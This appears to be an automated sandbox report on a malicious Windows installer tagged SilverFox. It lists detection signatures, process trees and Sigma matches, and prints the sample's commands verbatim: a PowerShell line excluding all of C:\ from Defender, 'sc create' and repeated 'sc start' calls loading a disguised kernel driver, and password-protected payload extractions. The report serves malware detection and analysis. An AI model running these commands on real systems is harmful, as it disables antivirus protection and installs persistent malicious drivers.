Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.9.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_1.0.9.exe
renamed because original name is a hash value
Original sample name: _1.0.9.exe
Analysis ID: 1579605
MD5: ff430c30f7b9f0550f6b68dcc709c55b
SHA1: a47d3d79a05d232d45aadd14045765521cfd8431
SHA256: 6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: FF430C30F7B9F0550F6B68DCC709C55B)
    • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7008 cmdline: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 3224 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 3064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: FF430C30F7B9F0550F6B68DCC709C55B)
        • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 6220 cmdline: "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 6868 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 4972 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 368 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6288 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3192 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7144 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4836 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3412 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5800 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3192 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 368, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 368, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
No Suricata rule has matched

Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb, source: 7zr.exe, 0000000C.00000003.2167599530.0000000003410000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2167479106.0000000003210000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, Code function: 6_2_6CE3AEC0 FindFirstFileA,FindClose,FindClose,6_2_6CE3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 10_2_00466868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00466868
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 10_2_00467496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00467496
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr, String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr, String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr, String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, Process information set: 01 00 00 00

System Summary

Source: update.vac.2.dr | Static PE information: section name: .=~
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE45120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC1950 CreateFileA,DeviceIoControl,CloseHandle
